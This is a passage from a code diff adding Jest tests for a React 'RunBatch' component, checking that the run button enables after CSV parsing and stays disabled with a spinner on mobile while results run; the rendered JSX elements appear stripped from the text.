+}) + +const mockUseBreakpoints = useBreakpoints as jest.Mock + +describe('RunBatch', () => { + const vars = [{ name: 'prompt' }] + + beforeEach(() => { + mockUseBreakpoints.mockReturnValue(MediaType.pc) + latestOnParsed = undefined + receivedCSVDownloadProps = undefined + jest.clearAllMocks() + }) + + test('should enable run button after CSV parsed and send data', async () => { + const onSend = jest.fn() + render( + , + ) + + expect(receivedCSVDownloadProps?.vars).toEqual(vars) + await act(async () => { + latestOnParsed?.([['row1']]) + }) + + const runButton = screen.getByRole('button', { name: 'share.generation.run' }) + await waitFor(() => { + expect(runButton).not.toBeDisabled() + }) + + fireEvent.click(runButton) + expect(onSend).toHaveBeenCalledWith([['row1']]) + }) + + test('should keep button disabled and show spinner when results still running on mobile', async () => { + mockUseBreakpoints.mockReturnValue(MediaType.mobile) + const onSend = jest.fn() + const { container } = render( + , + ) + + await act(async () => { + latestOnParsed?.([['row']]) + }) + + const runButton = screen.getByRole('button', { name: 'share.generation.run' }) + await waitFor(() => { + expect(runButton).toBeDisabled() + }) + expect(runButton).toHaveClass('grow') + const icon = container.querySelector('svg') + expect(icon).toHaveClass('animate-spin') + expect(onSend).not.toHaveBeenCalled() + }) +})